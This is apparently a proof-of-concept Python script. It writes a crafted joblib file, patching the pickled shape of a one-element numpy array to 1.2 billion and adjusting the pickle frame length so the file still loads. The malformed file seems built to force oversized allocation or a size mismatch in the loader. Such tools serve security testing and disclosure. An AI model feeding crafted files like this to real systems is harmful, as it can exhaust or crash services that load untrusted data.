| #!/usr/bin/env python3 | |
| import pathlib | |
| import struct | |
| import joblib | |
| import numpy as np | |
# Pickle byte sequence searched for in the seed file: the string "shape"
# followed by the one-element tuple (1,).
SHAPE_PATTERN = (
    b"\x8c\x05shape"  # SHORT_BINUNICODE, length 5, "shape"
    b"\x94"  # MEMOIZE
    b"K\x01"  # BININT1 with value 1
    b"\x85"  # TUPLE1
    b"\x94"  # MEMOIZE
)
def build(out_path: pathlib.Path, shape: int = 1_200_000_000) -> None:
    """Write a joblib file whose pickled shape tuple is patched to ``(shape,)``.

    A one-element ``uint8`` array is dumped uncompressed with joblib to a
    temporary ``.seed`` file next to ``out_path``. The bytes matching
    ``SHAPE_PATTERN`` are replaced by the same ``shape`` key followed by a
    one-element tuple holding ``shape``, and the 8-byte frame length stored at
    offset 3 is adjusted by the resulting size difference. All other bytes of
    the seed are written to ``out_path`` unchanged.

    Args:
        out_path: Destination file.
        shape: Integer to store in the patched tuple. Values in the signed
            32-bit range are encoded with the BININT opcode (``J``); values
            outside it are encoded with LONG1.

    Raises:
        RuntimeError: If the shape pattern is not found, the seed does not
            begin with a pickle frame header, or the pattern lies outside
            that first frame.
        ValueError: If ``shape`` needs more than 255 bytes to encode.
    """
    seed_path = out_path.with_suffix(".seed")
    try:
        joblib.dump(np.zeros((1,), dtype=np.uint8), seed_path, compress=0)
        data = bytearray(seed_path.read_bytes())
    finally:
        # Do not leave the temporary seed behind when dumping/reading fails.
        try:
            seed_path.unlink()
        except FileNotFoundError:
            # The dump failed before the file was created; nothing to remove.
            pass

    pos = data.find(SHAPE_PATTERN)
    if pos < 0:
        raise RuntimeError("shape pattern not found in seed joblib file")
    pattern_end = pos + len(SHAPE_PATTERN)

    # Layout relied on below: PROTO opcode + version (2 bytes), FRAME opcode
    # (0x95) at offset 2, then the little-endian 8-byte frame length at
    # offset 3, so the frame payload starts at offset 11.
    if len(data) < 11 or data[2:3] != b"\x95":
        raise RuntimeError("seed joblib file does not start with a pickle frame")
    frame_len = struct.unpack_from("<Q", data, 3)[0]
    if pos < 11 or pattern_end > 11 + frame_len:
        # Patching the first frame's length would be wrong in this case.
        raise RuntimeError("shape pattern lies outside the first pickle frame")

    if -(2**31) <= shape < 2**31:
        # BININT: 4-byte little-endian signed integer.
        encoded = b"J" + struct.pack("<i", shape)
    else:
        # LONG1: 1-byte length, then little-endian two's-complement bytes.
        payload = shape.to_bytes(
            (shape.bit_length() >> 3) + 1, "little", signed=True
        )
        if len(payload) > 255:
            raise ValueError("shape is too large to encode with LONG1")
        encoded = b"\x8a" + bytes([len(payload)]) + payload

    replacement = b"\x8c\x05shape\x94" + encoded + b"\x85\x94"
    data[pos:pattern_end] = replacement

    # The frame now holds a longer integer encoding; keep its length in sync.
    delta = len(replacement) - len(SHAPE_PATTERN)
    struct.pack_into("<Q", data, 3, frame_len + delta)
    out_path.write_bytes(data)
def main() -> None:
    """Build the default crafted file in the working directory and print its size."""
    target = pathlib.Path("joblib-inline-shape-1200m.joblib")
    build(target)
    size = target.stat().st_size
    print(f"wrote {target} ({size} bytes)")


# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()